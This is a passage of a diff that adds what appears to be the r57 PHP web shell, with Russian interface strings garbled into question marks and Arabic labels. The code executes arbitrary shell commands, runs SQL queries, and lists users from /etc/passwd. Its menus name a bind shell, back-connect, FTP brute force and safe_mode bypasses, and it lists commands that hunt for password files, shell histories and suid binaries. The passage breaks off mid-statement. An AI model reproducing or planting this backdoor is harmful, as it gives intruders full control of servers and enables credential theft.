".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#cccccc><font face=Verdana size=2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=2><b>'.$key.'</b></font></td><td><font face=Verdana size=2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +/* --------------------------------------------------------------- */ +'eng_text1' =>'الأمر المطبق', +'eng_text2' =>'تنفيذ أوامر على السيرفر', +'eng_text3' =>'تطبيق أمر معين', +'eng_text4' =>'منطقة العمل', +'eng_text5' =>'رفع ملف إلى السيرفر', +'eng_text6' =>'الملف المراد رفعه', +'eng_text7' =>'ملفات مشهورة (يعني أهم الملفات إلي تحتاجها)هه', +'eng_text8' =>'إختر الملف', +'eng_butt1' =>'تنفيذ', +'eng_butt2' =>'رفع', +'eng_text9' =>'فتح بورت على السيرفر/bin/bash', +'eng_text10'=>'البورت', +'eng_text11'=>'باسورد الوصول', +'eng_butt3' =>'فتح', +'eng_text12'=>'إتصال عكسي', +'eng_text13'=>'IP', +'eng_text14'=>'البورت', +'eng_butt4' =>'إتصال', +'eng_text15'=>'تحميل ملف من موقع خارجي', +'eng_text16'=>'مع', +'eng_text17'=>'عنوان الملف', +'eng_text18'=>'الملف على السيرفر', +'eng_text19'=>'الإستغلال', +'eng_text20'=>'إستخدام', +'eng_text21'=>'&nbsp;إسم جديد', +'eng_text22'=>'datapipe', +'eng_text23'=>'المنفذ المحلي', +'eng_text24'=>'سيرفر بعيد', +'eng_text25'=>'Remote port', +'eng_text26'=>'إستخدام', +'eng_butt5' =>'تشغيل', +'eng_text28'=>'العمل في الوضع الآمن', +'eng_text29'=>'لم يتم الوصول', +'eng_butt6' =>'تغير', +'eng_text30'=>'عرض ملف', +'eng_butt7' =>'إظهار', +'eng_text31'=>'الملف غير موجود', +'eng_text32'=>'الكود الخبيث', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'إختبار', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'القاعدة', +'eng_text37'=>'اليوزر', +'eng_text38'=>'الباسورد', +'eng_text39'=>'جدول', +'eng_text40'=>'أخذ نسخه من قواعد البيانات', +'eng_butt9' =>'أخذ نسخه', +'eng_text41'=>'أخذ نسخه إلى ملف', +'eng_text42'=>'تحرير ملف', +'eng_text43'=>'الملف المراد تحريره', +'eng_butt10'=>'تخزين', +'eng_text44'=>'لا تستطيع تحرير الملف ,فقد تستطيع القرائة', +'eng_text45'=>'تخزين ملف', +'eng_text46'=>'phpinfo() إظهار معلومات الــ', +'eng_text47'=>'php.ini عرض المتغيرات من', +'eng_text48'=>'مسح ملفات التبت', +'eng_butt11'=>'تحرير ملف', +'eng_text49'=>'مسح الشل من السيرفر', +'eng_text50'=>'cpuعرض معلومات', +'eng_text51'=>'عرض حجم الذاكرة', +'eng_text52'=>'بحث عن نص', +'eng_text53'=>'في المجلدات', +'eng_text54'=>'إبحث عن نص في ملف', +'eng_butt12'=>'بحث', +'eng_text55'=>'فقط في الملفات', +'eng_text56'=>'لا شيء):', +'eng_text57'=>'تكوين/مسح ملف/مجلد', +'eng_text58'=>'الإسم', +'eng_text59'=>'الملف', +'eng_text60'=>'المجلد', +'eng_butt13'=>'إنشاء/حذف', +'eng_text61'=>'ملف أنشئ', +'eng_text62'=>'مجلد أنشئ', +'eng_text63'=>'الملف حذف', +'eng_text64'=>'المجلد حذف', +'eng_text65'=>'إنشاء', +'eng_text66'=>'حذف', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'أمر', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'مستند للبحث', +'eng_text73'=>'بحث في المجلدات', +'eng_text74'=>'بحث في الملفات', +'eng_text75'=>'* regexp تستطيع إستدام', +'eng_text76'=>'البحث عن نص في الملفات عن طريق الأمر بحث', +'eng_text77'=>'إظهار تركيبة قاعدة البيانات', +'eng_text78'=>'إظهار الجداول', +'eng_text79'=>'إظهار الأعمدة', +'eng_text80'=>'النوع', +'eng_text81'=>'الشبكة', +'eng_text82'=>'قواعد البيانات', +'eng_text83'=>'SQLشغل إستعلامات الــ ', +'eng_text84'=>'SQLإستعلامات الــ', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'تنزيل ملفات من السيرفر', +'eng_butt14'=>'تنزيل', +'eng_text87'=>'FTP-serverتنزيل ملف من ', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'FTPالملف على', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'قائمة الأعضاء', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'FTP-serverإرسال ملف إلى', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'البريد', +'eng_text103'=>'إرسل رسالة بريد إلكتروني', +'eng_text104'=>'إرسال ملف إلى بريد إلكتروني', +'eng_text105'=>'إلى', +'eng_text106'=>'من', +'eng_text107'=>'العنوان', +'eng_butt15'=>'إرسال', +'eng_text108'=>'البريد', +'eng_text109'=>'إخفاء', +'eng_text110'=>'إظهار', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = 